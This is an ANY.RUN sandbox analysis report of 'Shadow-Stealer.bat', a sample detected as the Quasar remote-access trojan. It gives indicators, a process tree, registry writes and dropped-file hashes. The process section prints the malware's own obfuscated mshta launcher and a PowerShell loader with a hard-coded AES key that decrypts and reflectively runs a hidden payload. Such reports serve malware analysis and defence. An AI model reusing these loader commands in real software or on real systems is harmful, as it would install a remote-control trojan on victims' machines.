File name:

Shadow-Stealer.bat

Full analysis: https://app.any.run/tasks/9f161d26-4048-4ea6-a10a-9494842a776e
Verdict: Malicious activity
Threats:

Quasar is a very popular RAT in the world thanks to its code being available in open-source. This malware can be used to control the victim’s computer remotely.

Malware Trends Tracker     >>>
Analysis date: December 03, 2023, 17:33:55
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
quasar
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF line terminators
MD5:

CF5B412FFC3CE43CD7DDCE602FC67F56

SHA1:

221DFCD0868158F676C472D8A5BCF9647F0C7D51

SHA256:

84BA648CFDD5C2AE8D3292FCC1702E385A1A26E915BD7275B5FDE776212F2724

SSDEEP:

49152:mmlB6XvIxKx/znMtw4e/x4dA+ilmm5C5rsw1y1lkGxJW5RXLnfaWixbVoZmb0nYk:b

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Starts PowerShell from an unusual location

      • cmd.exe (PID: 4320)
      • cmd.exe (PID: 1360)
      • $sxr-cmd.exe (PID: 3780)
      • $sxr-powershell.exe (PID: 6312)

    • Drops the executable file immediately after the start

      • cmd.exe (PID: 4320)
      • Shadow-Stealer.bat.exe (PID: 6484)

    • Known privilege escalation attack

      • dllhost.exe (PID: 2480)

    • Application was injected by another process

      • dllhost.exe (PID: 4484)
      • dllhost.exe (PID: 4344)
      • dllhost.exe (PID: 6132)
      • dllhost.exe (PID: 7644)
      • dllhost.exe (PID: 7364)
      • dllhost.exe (PID: 4572)
      • dllhost.exe (PID: 7304)
      • dllhost.exe (PID: 8084)
      • dllhost.exe (PID: 7820)

    • Runs injected code in another process

      • $sxr-powershell.exe (PID: 6312)
      • Shadow-Stealer.bat.exe (PID: 6484)

    • Starts CMD.EXE for self-deleting

      • Shadow-Stealer.bat.exe (PID: 6484)

    • QUASAR has been detected (YARA)

      • $sxr-powershell.exe (PID: 6312)

  • SUSPICIOUS

    • Process drops legitimate windows executable

      • cmd.exe (PID: 4320)
      • Shadow-Stealer.bat.exe (PID: 6484)

    • Start notepad (likely ransomware note)

      • Shadow-Stealer.bat.exe (PID: 5392)

    • Checks Windows Trust Settings

      • Shadow-Stealer.bat.exe (PID: 5392)
      • Shadow-Stealer.bat.exe (PID: 6484)
      • $sxr-powershell.exe (PID: 6312)
      • $sxr-powershell.exe (PID: 1540)

    • Starts CMD.EXE for commands execution

      • dllhost.exe (PID: 2480)
      • Shadow-Stealer.bat.exe (PID: 6484)

    • Executing commands from a ".bat" file

      • dllhost.exe (PID: 2480)
      • Shadow-Stealer.bat.exe (PID: 6484)

    • Base64-obfuscated command line is found

      • Shadow-Stealer.bat.exe (PID: 5392)

    • Reads security settings of Internet Explorer

      • Shadow-Stealer.bat.exe (PID: 6484)
      • $sxr-powershell.exe (PID: 6312)
      • $sxr-powershell.exe (PID: 1540)
      • Shadow-Stealer.bat.exe (PID: 5392)

    • Starts itself from another location

      • Shadow-Stealer.bat.exe (PID: 5392)

    • Starts POWERSHELL.EXE for commands execution

      • Shadow-Stealer.bat.exe (PID: 5392)

    • Reads Microsoft Outlook installation path

      • $sxr-mshta.exe (PID: 1460)

    • The process executes via Task Scheduler

      • $sxr-mshta.exe (PID: 1460)

    • Reads Internet Explorer settings

      • $sxr-mshta.exe (PID: 1460)

    • Get information on the list of running processes

      • $sxr-cmd.exe (PID: 3780)
      • $sxr-powershell.exe (PID: 6312)

    • The process creates files with name similar to system file names

      • Shadow-Stealer.bat.exe (PID: 6484)

    • Application launched itself

      • $sxr-powershell.exe (PID: 6312)

    • Executes application which crashes

      • dllhost.exe (PID: 7364)

    • Connects to unusual port

      • $sxr-powershell.exe (PID: 6312)

    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 7588)

    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 7588)

    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 7588)

  • INFO

    • Checks supported languages

      • Shadow-Stealer.bat.exe (PID: 5392)
      • Shadow-Stealer.bat.exe (PID: 6484)
      • $sxr-mshta.exe (PID: 1460)
      • $sxr-cmd.exe (PID: 3780)
      • $sxr-powershell.exe (PID: 6312)
      • $sxr-powershell.exe (PID: 1540)

    • Process checks Powershell version

      • Shadow-Stealer.bat.exe (PID: 5392)
      • Shadow-Stealer.bat.exe (PID: 6484)
      • $sxr-powershell.exe (PID: 6312)
      • $sxr-powershell.exe (PID: 1540)

    • Reads the computer name

      • Shadow-Stealer.bat.exe (PID: 5392)
      • Shadow-Stealer.bat.exe (PID: 6484)
      • $sxr-mshta.exe (PID: 1460)
      • $sxr-powershell.exe (PID: 6312)
      • $sxr-powershell.exe (PID: 1540)

    • Reads the machine GUID from the registry

      • Shadow-Stealer.bat.exe (PID: 5392)
      • Shadow-Stealer.bat.exe (PID: 6484)
      • $sxr-powershell.exe (PID: 6312)
      • $sxr-powershell.exe (PID: 1540)

    • Checks transactions between databases Windows and Oracle

      • powershell.exe (PID: 6596)

    • Reads the software policy settings

      • Shadow-Stealer.bat.exe (PID: 6484)
      • $sxr-powershell.exe (PID: 6312)
      • $sxr-powershell.exe (PID: 1540)
      • Shadow-Stealer.bat.exe (PID: 5392)

    • Creates files or folders in the user directory

      • Shadow-Stealer.bat.exe (PID: 5392)

    • Reads Environment values

      • Shadow-Stealer.bat.exe (PID: 6484)
      • $sxr-mshta.exe (PID: 1460)
      • $sxr-powershell.exe (PID: 6312)
      • $sxr-powershell.exe (PID: 1540)
      • Shadow-Stealer.bat.exe (PID: 5392)

    • Create files in a temporary directory

      • Shadow-Stealer.bat.exe (PID: 6484)
      • $sxr-powershell.exe (PID: 6312)
      • $sxr-powershell.exe (PID: 1540)
      • Shadow-Stealer.bat.exe (PID: 5392)

    • Process checks Internet Explorer phishing filters

      • $sxr-mshta.exe (PID: 1460)

    • Process checks computer location settings

      • $sxr-mshta.exe (PID: 1460)
      • Shadow-Stealer.bat.exe (PID: 6484)
      • Shadow-Stealer.bat.exe (PID: 5392)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
165
Monitored processes
38
Malicious processes
8
Suspicious processes
1

Behavior graph

Click at the process to see the details
start inject inject inject inject inject inject inject inject inject cmd.exe no specs conhost.exe no specs shadow-stealer.bat.exe no specs notepad.exe no specs powershell.exe no specs conhost.exe no specs CMSTPLUA no specs cmd.exe no specs conhost.exe no specs shadow-stealer.bat.exe no specs dllhost.exe dllhost.exe no specs $sxr-mshta.exe no specs $sxr-cmd.exe no specs conhost.exe no specs #QUASAR $sxr-powershell.exe dllhost.exe dllhost.exe no specs $sxr-powershell.exe no specs dllhost.exe dllhost.exe no specs dllhost.exe dllhost.exe no specs dllhost.exe dllhost.exe no specs dllhost.exe dllhost.exe no specs dllhost.exe dllhost.exe no specs dllhost.exe dllhost.exe no specs dllhost.exe dllhost.exe no specs cmd.exe no specs conhost.exe no specs ping.exe no specs taskkill.exe no specs attrib.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
232C:\Windows\SysWOW64\dllhost.exe /Processid:{a7bbb80d-832c-46b3-b6d7-ce22e4ce220e}C:\Windows\SysWOW64\dllhost.exe$sxr-powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
COM Surrogate
Exit code:
0
Version:
10.0.19041.546 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
1360C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\Shadow-Stealer.bat" "C:\Windows\System32\cmd.exedllhost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
1460C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"C:\Windows\$sxr-mshta.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\$sxr-mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\wldp.dll
c:\windows\system32\mshtml.dll
1540"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6312).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = [Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))C:\Windows\$sxr-powershell.exe$sxr-powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.546 (WinBuild.160101.0800)
Modules
Images
c:\windows\$sxr-powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1752C:\Windows\SysWOW64\dllhost.exe /Processid:{4ff968b2-86c5-482d-ac84-917c711a03b1}C:\Windows\SysWOW64\dllhost.exeShadow-Stealer.bat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
COM Surrogate
Exit code:
0
Version:
10.0.19041.546 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
2480C:\WINDOWS\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}C:\Windows\System32\dllhost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
COM Surrogate
Exit code:
0
Version:
10.0.19041.546 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
3020\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3116\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exe$sxr-cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3200"C:\Windows\System32\notepad.exe" C:\Windows\System32\notepad.exeShadow-Stealer.bat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
4294967295
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
3780"C:\Windows\$sxr-cmd.exe" /c %$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%C:\Windows\$sxr-cmd.exe$sxr-mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.746 (WinBuild.160101.0800)
Modules
Images
c:\windows\$sxr-cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\shlwapi.dll
Total events
21 489
Read events
21 446
Write events
40
Delete events
3

Modification events

(PID) Process:(5392) Shadow-Stealer.bat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(5392) Shadow-Stealer.bat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(5392) Shadow-Stealer.bat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(5392) Shadow-Stealer.bat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(2480) dllhost.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2480) dllhost.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2480) dllhost.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2480) dllhost.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(6596) powershell.exeKey:HKEY_CURRENT_USER\Environment
Operation:delete valueName:tfutWIwDIVfhoNZuYdGJ
Value:
C:\Users\admin\Desktop\Shadow-Stealer.bat
(PID) Process:(1460) $sxr-mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
Executable files
4
Suspicious files
1
Text files
12
Unknown types
0

Dropped files

PID
Process
Filename
Type
5392Shadow-Stealer.bat.exeC:\Users\admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Shadow-Stealer.bat.exe.logtext
MD5:822E8EDDE34F458947DE4A2BD44A7A10
SHA256:2DC2C8FCEB374EC74F9FCCFFDBE29E8120907098E3A947A2722A10E1A66CEE23
6596powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zril2adb.rm1.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6484Shadow-Stealer.bat.exeC:\Windows\$sxr-powershell.exeexecutable
MD5:04029E121A0CFA5991749937DD22A1D9
SHA256:9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F
6312$sxr-powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_a2qzsacz.uwa.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6312$sxr-powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_trqj4ks0.dz1.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6484Shadow-Stealer.bat.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3rvwussw.ghh.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5392Shadow-Stealer.bat.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_l5uzz23k.n1g.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5392Shadow-Stealer.bat.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:3C2119524D18EDBDEF6D9CF248CABD35
SHA256:7DF23E8D1BED8C94E5329304F48A2C97AE3274AD41C8EB276726A7FE64D003A5
1540$sxr-powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wfzeueyn.1vv.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6596powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3nz3wogp.ql5.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
